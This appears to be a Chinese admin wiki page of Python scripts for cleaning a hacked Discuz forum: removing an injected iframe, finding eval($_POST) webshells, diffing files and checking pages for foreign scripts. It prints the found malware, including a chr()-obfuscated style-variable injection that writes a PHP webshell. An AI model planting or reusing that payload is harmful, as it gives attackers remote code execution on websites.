====== 查找并删除木马代码 ======
<code python>
import os
import sys
import re

##网站目录
n = "./"
##木马代码
js = "<iframe src=http://asd3.9966.org/kuaile123/4.htm"+" width=111 height=0 border=0></iframe>"

for root,dirs,files in os.walk(n):
    #if root.find('/attachments') == -1:
        #print root,dirs,files
        for f in files:
            sContent = open(root+"/"+f).read()
	    ##if f.endswith(".php") or sContent.find(js) != -1 :
            if sContent.find(js) != -1 :
                print root + "/" + f
                s = sContent.replace(js, "")
                if s and s !='':
                    open(root + "/" + f , 'w').write( s )
</code>
下载： {{python:remove_iframe.py.txt|}}

====== 查找web shell代码 ======
查找所有 eval($_POST)类似代码

<code python>
import os
import sys
import re

##网站目录
n = "./"
##查找 eval($_POST) 类似代码
p = re.compile("eval([ \t\n\r]*)\(([ \t\n\r]*)\$_(post|get)([ \t\n\r]*)", re.I)

for root,dirs,files in os.walk(n):
    #if root.find('/attachments') == -1 :
        #print root,dirs,files
        for f in files:
            sContent = open(root+"/"+f).read()
            m = p.search(sContent)
            if f.endswith(".php") and  m:
                print root + "/" + f
                print " ", m.group()
</code>

下载：{{python:find_webshell.py.txt|}}

====== 比较代码======
比较论坛代码与原始dz代码有哪些文件不同
<code python>
import os

dzpath = "/home/kenvin/discuz/upload/"
webpath = "/data/forum"
os.chdir(webpath )
for root,dirs,files in os.walk("."):
    if root.find('/attachments') == -1 and root.find('/data') == -1 and root.find('/forumdata') == -1 :
        #print root,dirs,files
        for f in files:
            if f.endswith(".php"):
                #sContent = open(root+"/"+f).read()
                #m = p.search(sContent)
                mysize = os.path.getsize( root+"/"+f )
                if os.path.exists(dzpath +  root+"/"+f ):
                    size = os.path.getsize(dzpath +  root+"/"+f )
                    if mysize != size :
                        print  root+"/"+f  , "\t", mysize, size
                else:
                    print  root+"/"+f
</code> 

===== 在dz自定义风格中插入的代码 =====
 
变量名：
<code>
','');fputs(fopen(chr(117).chr(115).chr(101).chr(114).chr(103).chr(114).chr(111).chr(117).chr(112).chr(95).chr(48).chr(46).chr(112).chr(104).chr(112),chr(119)),chr(60).chr(63).chr(112).chr(104).chr(112).chr(32).chr(40).chr(115).chr(117).chr(98).chr(115).chr(116).chr(114).chr(40).chr(109).chr(100).chr(53).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(98).chr(39).chr(93).chr(41).chr(44).chr(50).chr(56).chr(41).chr(61).chr(61).chr(39).chr(55).chr(97).chr(97).chr(97).chr(39).chr(41).chr(32).chr(38).chr(38).chr(32).chr(101).chr(118).chr(97).chr(108).chr(40).chr(36).chr(95).chr(80).chr(79).chr(83).chr(84).chr(91).chr(39).chr(97).chr(39).chr(93).chr(41).chr(59).chr(63).chr(62));//
</code>


===== 检查网站页面是否有不明js或iframe=====

<code python>
import re
import urllib

url = "http://forum.techweb.com.cn"
olist = ['techweb.adsame.com', 'www.techweb.com.cn', 'www.google-analytics.com']

p = re.compile("<(script|iframe)[^>]+src[\s]*=[\s]*['\"]?http://(.*?)['\"]?[ />]", re.I + re.S)
c = urllib.urlopen(url).read()
m = p.findall(c)
for n in m:
    if n[1] not in olist:
        msg = url + " find " + n[0] + " src=http://" + n[1]
        print msg
        #send(msg, True)
</code>